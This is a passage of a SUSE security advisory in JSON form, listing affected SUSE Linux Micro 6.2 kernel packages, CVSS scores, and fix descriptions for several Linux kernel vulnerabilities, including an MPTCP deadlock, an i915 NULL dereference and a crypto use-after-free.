"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71123"
},
{
"cve": "CVE-2025-71126",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71126"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: avoid deadlock on fallback while reinjecting\n\nJakub reported an MPTCP deadlock at fallback time:\n\n WARNING: possible recursive locking detected\n 6.18.0-rc7-virtme #1 Not tainted\n --------------------------------------------\n mptcp_connect/20858 is trying to acquire lock:\n ff1100001da18b60 (\u0026msk-\u003efallback_lock){+.-.}-{3:3}, at: __mptcp_try_fallback+0xd8/0x280\n\n but task is already holding lock:\n ff1100001da18b60 (\u0026msk-\u003efallback_lock){+.-.}-{3:3}, at: __mptcp_retrans+0x352/0xaa0\n\n other info that might help us debug this:\n Possible unsafe locking scenario:\n\n CPU0\n ----\n lock(\u0026msk-\u003efallback_lock);\n lock(\u0026msk-\u003efallback_lock);\n\n *** DEADLOCK ***\n\n May be due to missing lock nesting notation\n\n 3 locks held by mptcp_connect/20858:\n #0: ff1100001da18290 (sk_lock-AF_INET){+.+.}-{0:0}, at: mptcp_sendmsg+0x114/0x1bc0\n #1: ff1100001db40fd0 (k-sk_lock-AF_INET#2){+.+.}-{0:0}, at: __mptcp_retrans+0x2cb/0xaa0\n #2: ff1100001da18b60 (\u0026msk-\u003efallback_lock){+.-.}-{3:3}, at: __mptcp_retrans+0x352/0xaa0\n\n stack backtrace:\n CPU: 0 UID: 0 PID: 20858 Comm: mptcp_connect Not tainted 6.18.0-rc7-virtme #1 PREEMPT(full)\n Hardware name: Bochs, BIOS Bochs 01/01/2011\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xa0\n print_deadlock_bug.cold+0xc0/0xcd\n validate_chain+0x2ff/0x5f0\n __lock_acquire+0x34c/0x740\n lock_acquire.part.0+0xbc/0x260\n _raw_spin_lock_bh+0x38/0x50\n __mptcp_try_fallback+0xd8/0x280\n mptcp_sendmsg_frag+0x16c2/0x3050\n __mptcp_retrans+0x421/0xaa0\n mptcp_release_cb+0x5aa/0xa70\n release_sock+0xab/0x1d0\n mptcp_sendmsg+0xd5b/0x1bc0\n sock_write_iter+0x281/0x4d0\n new_sync_write+0x3c5/0x6f0\n vfs_write+0x65e/0xbb0\n ksys_write+0x17e/0x200\n do_syscall_64+0xbb/0xfd0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n RIP: 0033:0x7fa5627cbc5e\n Code: 4d 89 d8 e8 14 bd 00 00 4c 8b 5d f8 41 8b 93 08 03 00 00 59 5e 48 83 f8 fc 74 11 c9 c3 0f 1f 80 00 00 00 00 48 8b 45 10 0f 05 \u003cc9\u003e c3 83 e2 39 83 fa 08 75 e7 e8 13 ff ff ff 0f 1f 00 f3 0f 1e fa\n RSP: 002b:00007fff1fe14700 EFLAGS: 00000202 ORIG_RAX: 0000000000000001\n RAX: ffffffffffffffda RBX: 0000000000000005 RCX: 00007fa5627cbc5e\n RDX: 0000000000001f9c RSI: 00007fff1fe16984 RDI: 0000000000000005\n RBP: 00007fff1fe14710 R08: 0000000000000000 R09: 0000000000000000\n R10: 0000000000000000 R11: 0000000000000202 R12: 00007fff1fe16920\n R13: 0000000000002000 R14: 0000000000001f9c R15: 0000000000001f9c\n\nThe packet scheduler could attempt a reinjection after receiving an\nMP_FAIL and before the infinite map has been transmitted, causing a\ndeadlock since MPTCP needs to do the reinjection atomically from WRT\nfallback.\n\nAddress the issue explicitly avoiding the reinjection in the critical\nscenario. Note that this is the only fallback critical section that\ncould potentially send packets and hit the double-lock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71126",
"url": "https://www.suse.com/security/cve/CVE-2025-71126"
},
{
"category": "external",
"summary": "SUSE Bug 1256755 for CVE-2025-71126",
"url": "https://bugzilla.suse.com/1256755"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71126"
},
{
"cve": "CVE-2025-71130",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71130"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915/gem: Zero-initialize the eb.vma array in i915_gem_do_execbuffer\n\nInitialize the eb.vma array with values of 0 when the eb structure is\nfirst set up. In particular, this sets the eb-\u003evma[i].vma pointers to\nNULL, simplifying cleanup and getting rid of the bug described below.\n\nDuring the execution of eb_lookup_vmas(), the eb-\u003evma array is\nsuccessively filled up with struct eb_vma objects. This process includes\ncalling eb_add_vma(), which might fail; however, even in the event of\nfailure, eb-\u003evma[i].vma is set for the currently processed buffer.\n\nIf eb_add_vma() fails, eb_lookup_vmas() returns with an error, which\nprompts a call to eb_release_vmas() to clean up the mess. Since\neb_lookup_vmas() might fail during processing any (possibly not first)\nbuffer, eb_release_vmas() checks whether a buffer\u0027s vma is NULL to know\nat what point did the lookup function fail.\n\nIn eb_lookup_vmas(), eb-\u003evma[i].vma is set to NULL if either the helper\nfunction eb_lookup_vma() or eb_validate_vma() fails. eb-\u003evma[i+1].vma is\nset to NULL in case i915_gem_object_userptr_submit_init() fails; the\ncurrent one needs to be cleaned up by eb_release_vmas() at this point,\nso the next one is set. If eb_add_vma() fails, neither the current nor\nthe next vma is set to NULL, which is a source of a NULL deref bug\ndescribed in the issue linked in the Closes tag.\n\nWhen entering eb_lookup_vmas(), the vma pointers are set to the slab\npoison value, instead of NULL. This doesn\u0027t matter for the actual\nlookup, since it gets overwritten anyway, however the eb_release_vmas()\nfunction only recognizes NULL as the stopping value, hence the pointers\nare being set to NULL as they go in case of intermediate failure. This\npatch changes the approach to filling them all with NULL at the start\ninstead, rather than handling that manually during failure.\n\n(cherry picked from commit 08889b706d4f0b8d2352b7ca29c2d8df4d0787cd)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71130",
"url": "https://www.suse.com/security/cve/CVE-2025-71130"
},
{
"category": "external",
"summary": "SUSE Bug 1256741 for CVE-2025-71130",
"url": "https://bugzilla.suse.com/1256741"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71130"
},
{
"cve": "CVE-2025-71131",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71131"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: seqiv - Do not use req-\u003eiv after crypto_aead_encrypt\n\nAs soon as crypto_aead_encrypt is called, the underlying request\nmay be freed by an asynchronous completion. Thus dereferencing\nreq-\u003eiv after it returns is invalid.\n\nInstead of checking req-\u003eiv against info, create a new variable\nunaligned_info and use it for that purpose instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
